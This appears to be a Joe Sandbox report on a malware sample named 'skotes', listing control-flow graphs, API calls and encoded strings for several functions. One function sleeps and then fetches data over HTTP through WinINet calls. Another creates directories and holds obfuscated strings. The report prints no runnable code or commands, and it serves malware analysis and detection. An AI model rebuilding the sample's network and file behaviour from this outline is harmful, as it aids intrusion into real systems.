                                                                                                                                                                                                                                          control_flow_graph 2053 6d2517-6d253f call 6d2133 call 6d2191 2058 6d26e5-6d271a call 6c6c87 call 6d2133 call 6d2191 2053->2058 2059 6d2545-6d2551 call 6d2139 2053->2059 2085 6d2720-6d272c call 6d2139 2058->2085 2086 6d2842-6d289e call 6c6c87 call 6d62ee 2058->2086 2059->2058 2064 6d2557-6d2562 2059->2064 2066 6d2598-6d25a1 call 6cadf5 2064->2066 2067 6d2564-6d2566 2064->2067 2076 6d25a4-6d25a9 2066->2076 2070 6d2568-6d256c 2067->2070 2073 6d256e-6d2570 2070->2073 2074 6d2588-6d258a 2070->2074 2077 6d2584-6d2586 2073->2077 2078 6d2572-6d2578 2073->2078 2079 6d258d-6d258f 2074->2079 2076->2076 2081 6d25ab-6d25cc call 6cb04b call 6cadf5 2076->2081 2077->2079 2078->2074 2082 6d257a-6d2582 2078->2082 2083 6d2595 2079->2083 2084 6d26e1-6d26e4 2079->2084 2081->2084 2101 6d25d2-6d25d5 2081->2101 2082->2070 2082->2077 2083->2066 2085->2086 2093 6d2732-6d273e call 6d2165 2085->2093 2103 6d28a8-6d28ab 2086->2103 2104 6d28a0-6d28a6 2086->2104 2093->2086 2102 6d2744-6d2765 call 6cadf5 GetTimeZoneInformation 2093->2102 2105 6d25d8-6d25dd 2101->2105 2116 6d276b-6d278c 2102->2116 2117 6d2820-6d2841 call 6d212d call 6d2121 call 6d2127 2102->2117 2106 6d28ad-6d28bd call 6cb04b 2103->2106 2107 6d28ee-6d2900 2103->2107 2104->2107 2105->2105 2109 6d25df-6d25f1 call 6ca1f1 2105->2109 2123 6d28bf 2106->2123 2124 6d28c7-6d28e0 call 6d62ee 2106->2124 2112 6d2910 2107->2112 2113 6d2902-6d2905 2107->2113 2109->2058 2129 6d25f7-6d260a call 6d4b17 2109->2129 2118 6d2915-6d292a call 6cadf5 call 6acff1 2112->2118 2119 6d2910 call 6d26f2 2112->2119 2113->2112 2120 6d2907-6d290e call 6d2517 2113->2120 2125 6d278e-6d2793 2116->2125 2126 6d2796-6d279d 2116->2126 2119->2118 2120->2118 2131 6d28c0-6d28c5 call 6cadf5 2123->2131 2149 6d28e5-6d28eb call 6cadf5 2124->2149 2150 6d28e2-6d28e3 2124->2150 2125->2126 2132 6d27af-6d27b1 2126->2132 2133 6d279f-6d27a6 2126->2133 2129->2058 2146 6d2610-6d2613 2129->2146 2157 6d28ed 2131->2157 2143 6d27b3-6d27dc call 6cef17 call 6ce926 2132->2143 2133->2132 2141 6d27a8-6d27ad 2133->2141 2141->2143 2165 6d27de-6d27e1 2143->2165 2166 6d27ea-6d27ec 2143->2166 2155 6d261b-6d2621 2146->2155 2156 6d2615-6d2619 2146->2156 2149->2157 2150->2131 2161 6d2624-6d2631 call 6c8bbe 2155->2161 2162 6d2623 2155->2162 2156->2146 2156->2155 2157->2107 2170 6d2634-6d2639 2161->2170 2162->2161 2165->2166 2168 6d27e3-6d27e8 2165->2168 2169 6d27ee-6d280c call 6ce926 2166->2169 2168->2169 2176 6d280e-6d2811 2169->2176 2177 6d281b-6d281e 2169->2177 2172 6d263b-6d2640 2170->2172 2173 6d2642-6d2643 2170->2173 2172->2173 2175 6d2645-6d2648 2172->2175 2173->2170 2178 6d264a-6d2661 call 6c8bbe 2175->2178 2179 6d2696-6d2699 2175->2179 2176->2177 2180 6d2813-6d2819 2176->2180 2177->2117 2189 6d2675-6d2677 2178->2189 2190 6d2663 2178->2190 2181 6d269b-6d269d 2179->2181 2182 6d26a0-6d26b4 2179->2182 2180->2117 2181->2182 2184 6d26ca 2182->2184 2185 6d26b6-6d26c6 call 6d4b17 2182->2185 2187 6d26cd-6d26df call 6d212d call 6d2121 2184->2187 2185->2058 2198 6d26c8 2185->2198 2187->2084 2189->2179 2193 6d2679-6d2689 call 6c8bbe 2189->2193 2191 6d2665-6d266a 2190->2191 2191->2189 2195 6d266c-6d2673 2191->2195 2202 6d2690-6d2694 2193->2202 2195->2189 2195->2191 2198->2187 2202->2179 2203 6d268b-6d268d 2202->2203 2203->2179 2204 6d268f 2203->2204 2204->2202
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,006E6758), ref: 006D275C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InformationTimeZone
                                                                                                                                                                                                                                          • String ID: Eastern Standard Time$Eastern Summer Time$Xgn
                                                                                                                                                                                                                                          • API String ID: 565725191-2117068305
                                                                                                                                                                                                                                          • Opcode ID: 32d5370754baeb773f2a60fedc45b719db730379c93cbe50bf037856100f53ef
                                                                                                                                                                                                                                          • Instruction ID: 008536a796ef66b831a4716370ce73273f88031a516a81ff48e14be50da88745
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32d5370754baeb773f2a60fedc45b719db730379c93cbe50bf037856100f53ef
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6EC10271E002469BDB209F68DC61AFA7BABEF65310F14409FE98197391E731CE46CB54
                                                                                                                                                                                                                                          Function 0069EB4E Relevance: 31.9, APIs: 3, Strings: 14, Instructions: 2131COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 0069EB51
                                                                                                                                                                                                                                          • CreateDirectoryA.KERNEL32(00000000), ref: 0069EC83
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 0069ED98
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesFile$CreateDirectory
                                                                                                                                                                                                                                          • String ID: mxo1L0x$#$111$246122658369$9c9aa5$FCQgKF==$FisgLnsCZO1i$GiQaT29tduF=$L1o$UA==$WDw=$WTs=$invalid stoi argument$stoi argument out of range
                                                                                                                                                                                                                                          • API String ID: 1875963930-2755506197
                                                                                                                                                                                                                                          • Opcode ID: 1f1dc1b9f8383fb26274178b89b770260d0afd8897ccfe229ea23aca97a30c5f
                                                                                                                                                                                                                                          • Instruction ID: d1882923a164cd639664a39d52a7bf8e9ffcaccf6fc0ec143576b7f042b52e21
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f1dc1b9f8383fb26274178b89b770260d0afd8897ccfe229ea23aca97a30c5f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42F23971A001489BEF18EB38CD8979DBB77AF82304F14819CE409A77D6DB359E848F95
                                                                                                                                                                                                                                          Function 0069BE30 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 313networkfilesleepCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1240 69be30-69be7c 1241 69c281-69c2a6 call 6a80c0 1240->1241 1242 69be82-69be86 1240->1242 1247 69c2a8-69c2b4 1241->1247 1248 69c2d4-69c2ec 1241->1248 1242->1241 1243 69be8c-69be90 1242->1243 1243->1241 1245 69be96-69bf2a Sleep InternetOpenW InternetConnectA call 6a7a00 call 695c10 1243->1245 1275 69bf2c 1245->1275 1276 69bf2e-69bf4a HttpOpenRequestA 1245->1276 1250 69c2ca-69c2d1 call 6ad663 1247->1250 1251 69c2b6-69c2c4 1247->1251 1252 69c238-69c250 1248->1252 1253 69c2f2-69c2fe 1248->1253 1250->1248 1251->1250 1255 69c34f-69c354 call 6c6c6a 1251->1255 1259 69c323-69c33f call 6acff1 1252->1259 1260 69c256-69c262 1252->1260 1257 69c22e-69c235 call 6ad663 1253->1257 1258 69c304-69c312 1253->1258 1257->1252 1258->1255 1265 69c314 1258->1265 1266 69c319-69c320 call 6ad663 1260->1266 1267 69c268-69c276 1260->1267 1265->1257 1266->1259 1267->1255 1273 69c27c 1267->1273 1273->1266 1275->1276 1277 69bf7b-69bfea call 6a7a00 call 695c10 call 6a7a00 call 695c10 1276->1277 1278 69bf4c-69bf5b 1276->1278 1292 69bfec 1277->1292 1293 69bfee-69c004 HttpSendRequestA 1277->1293 1280 69bf5d-69bf6b 1278->1280 1281 69bf71-69bf78 call 6ad663 1278->1281 1280->1281 1281->1277 1292->1293 1294 69c035-69c05d 1293->1294 1295 69c006-69c015 1293->1295 1298 69c05f-69c06e 1294->1298 1299 69c08e-69c0b5 InternetReadFile 1294->1299 1296 69c02b-69c032 call 6ad663 1295->1296 1297 69c017-69c025 1295->1297 1296->1294 1297->1296 1301 69c070-69c07e 1298->1301 1302 69c084-69c08b call 6ad663 1298->1302 1306 69c0c0-69c168 call 6c4250 InternetReadFile 1299->1306 1301->1302 1302->1299 1314 69c16a-69c170 1306->1314 1314->1306
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(000005DC,440B685B,?,00000000), ref: 0069BEB8
                                                                                                                                                                                                                                          • InternetOpenW.WININET(006E8DC8,00000000,00000000,00000000,00000000), ref: 0069BEC7
                                                                                                                                                                                                                                          • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0069BEEC
                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,00000000), ref: 0069BF36
                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(?,00000000), ref: 0069BFF6
                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,?,000003FF,?), ref: 0069C0A8
                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,00000000,000003FF,?,?,00000000,?,?), ref: 0069C161
                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 0069C187
                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 0069C18F
                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 0069C197
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
